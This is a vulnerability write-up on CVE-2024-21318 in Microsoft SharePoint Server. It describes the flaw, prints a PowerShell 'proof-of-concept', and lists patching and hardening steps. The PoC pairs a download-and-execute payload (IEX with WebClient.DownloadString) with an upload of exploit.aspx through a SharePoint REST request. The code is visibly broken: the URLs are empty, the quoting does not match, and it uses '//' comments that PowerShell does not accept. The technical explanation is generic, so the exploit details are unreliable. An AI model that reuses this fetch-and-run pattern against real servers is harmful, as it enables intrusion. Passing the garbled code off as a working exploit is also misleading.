CVE-2024-21318, a critical security vulnerability affecting Microsoft SharePoint Server, has been uncovered and poses a critical threat to organizations using the popular collaboration platform. This remote code execution vulnerability allows attackers to run arbitrary code on affected systems, resulting in the potential compromise of sensitive information, system resources, and unauthorized access to organization networks. It is crucial for system administrators and SharePoint users to understand the implications of this vulnerability, patch their systems, and undertake necessary remediation steps to secure their environment.

Original References

The CVE-2024-21318 vulnerability was first reported by reputed security researchers in collaboration with Microsoft:

- Link 1: Original Vulnerability Announcement
- Link 2: Microsoft Security Advisory

Exploit Details

The vulnerability exists due to improper input validation and insufficient sandboxing of user-supplied data. Attackers can exploit this vulnerability by crafting malicious payloads and uploading them to the SharePoint server. The server then processes these payloads, resulting in the execution of arbitrary code on the affected system.

Here's a code snippet detailing a proof-of-concept exploit

//Payload: PowerShell script to execute remote code
$Payload = @"
IEX (New-Object System.Net.WebClient).DownloadString('';)

//Uploading payload via HTTP POST request
$request = [System.Net.WebRequest]::Create(''/SitePages')/Files/add(url=\'exploit.aspx\',overwrite=true)';);

//HTTP POST request headers
$request.Headers.Add("binaryStringRequestBody", "true");
$request.Headers.Add("Authorization", "Bearer [Access_Token_Here]");
$request.Headers.Add("X-RequestDigest", "[Request_Digest_Here]");

//Sending request with payload
$response = $request.GetResponse();

The above Proof-of-Concept exploit uploads a malicious payload to the SharePoint server and triggers its execution, resulting in potential unauthorized system access or compromise.

Remediation Steps

It is essential for organizations to take immediate steps to address the CVE-2024-21318 vulnerability. The remediation process involves the following steps:

1. Update SharePoint Server: Microsoft has released security updates to address this vulnerability. System administrators should apply the security patches as soon as possible. Download and install the relevant update based on your SharePoint server version:

- Microsoft SharePoint Server 2019 Update
- Microsoft SharePoint Server 2016 Update
- Microsoft SharePoint Server 2013 Update

2. Review and Restrict User Permissions: Organizations should also review existing user access permissions to their SharePoint server. Access should be restricted to trusted users with legitimate business needs only. Regularly monitor and audit user activities to detect potential anomalies or malicious activities.

3. Implement Input Validation and Sandboxing: Implement proper input validation mechanisms and enforce strict sandboxing on user-supplied data. Ensuring that user inputs are appropriately sanitized can help prevent CVE-2024-21318 from being exploited. Additionally, consider implementing a Web Application Firewall (WAF) to help protect the SharePoint server from potential threats.

4. Regularly Scan for Vulnerabilities: Organizations should regularly perform vulnerability scans on their SharePoint environment. Regular scanning ensures that any potential security vulnerabilities are detected and remediated promptly.


The discovery of CVE-2024-21318 highlights the importance of maintaining secure SharePoint environments. By staying informed about the latest security vulnerabilities, applying necessary updates, and following recommended remediation steps, organizations can protect their critical data and IT infrastructure from emerging threats.


Published on: 01/09/2024 18:15:55 UTC
Last modified on: 04/11/2024 20:15:18 UTC